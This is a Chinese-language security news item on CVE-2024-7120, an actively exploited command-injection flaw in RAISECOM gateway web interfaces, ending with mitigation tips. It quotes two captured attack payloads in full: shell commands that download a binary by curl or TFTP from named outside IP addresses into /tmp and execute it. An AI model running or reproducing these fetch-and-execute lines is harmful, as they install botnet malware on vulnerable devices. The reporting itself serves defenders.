RAISECOM 网关中的严重漏洞被积极利用,数千人面临远程攻击

在 RAISECOM 网关设备中新发现并积极利用的漏洞对企业安全构成重大威胁。该漏洞被跟踪为 CVE-2024-7120,关键 CVSS 评分为 9.8,允许远程攻击者在受影响的设备上执行任意命令,可能导致未经授权的访问、数据泄露和系统受损。

命令注入漏洞存在于 Web 界面的 list_base_config.php 脚本中,影响运行软件版本 3.90 的 RAISECOM Gateway 型号 MSG1200、MSG2100E、MSG2200 和 MSG2300。安全研究人员已经证实了它很容易被利用,并且概念验证代码随时可用。

威胁行为者正在积极利用这一漏洞,自 9 月初以来就观察到了攻击,在 9 月 12 日至 13 日左右达到顶峰。

图片来源: Johannes B. Ullrich

安全专家、研究院长 Johannes B. Ullrich 博士确定了攻击中使用的两种不同的有效载荷。这些旨在下载和执行恶意软件的有效负载显示了常规僵尸网络扫描和破坏易受攻击的路由器的证据。

第一个有效载荷

 cd /tmp
rm -rf tplink
curl http://45.202.35.94/tplink --output tplink
chmod 777 tplink
./tplink

第二个负载(使用 TFTP 而不是 HTTP):

 cd /tmp
tftp -g -r ppc 141.98.11.136 69
chmod 777 ppc
./ppc raisee

虽然 RAISECOM 尚未发布补丁,但立即采取行动对于降低风险至关重要:

  • 限制访问:将对设备 Web 界面的访问限制为仅受信任的网络和授权人员。
  • 输入验证:在 Web 界面上实施严格的输入验证和清理程序,以防止恶意代码注入。
  • 网络监控:采用强大的网络监控和入侵检测系统来识别和响应任何可疑活动。
免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐